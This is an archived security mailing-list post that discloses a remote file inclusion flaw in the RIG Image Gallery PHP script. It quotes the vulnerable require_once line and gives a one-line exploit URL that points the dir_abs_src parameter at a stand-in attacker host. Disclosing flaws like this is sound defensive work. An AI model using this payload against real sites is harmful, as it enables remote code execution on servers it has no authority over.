RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability Jul 30 2007 07:09PM
ilkerkandemir mynet com (1 replies)
------------------------------------------------------------------------
-------------------------------------------

MEFISTO PreSents...

Script: RIG Image Gallery
Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));

------------------------------------------------------------------------
-------------------------------------------

Exploit: check_entry.php?dir_abs_src=http://attacker.php?

------------------------------------------------------------------------
-------------------------------------------

Tnx:H0tturk,Ajann,Dumenci,Str0ke

[ reply ]
Re: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability Dec 07 2007 02:11AM
security curmudgeon (jericho attrition org)


 

Privacy Statement
Copyright 2010, SecurityFocus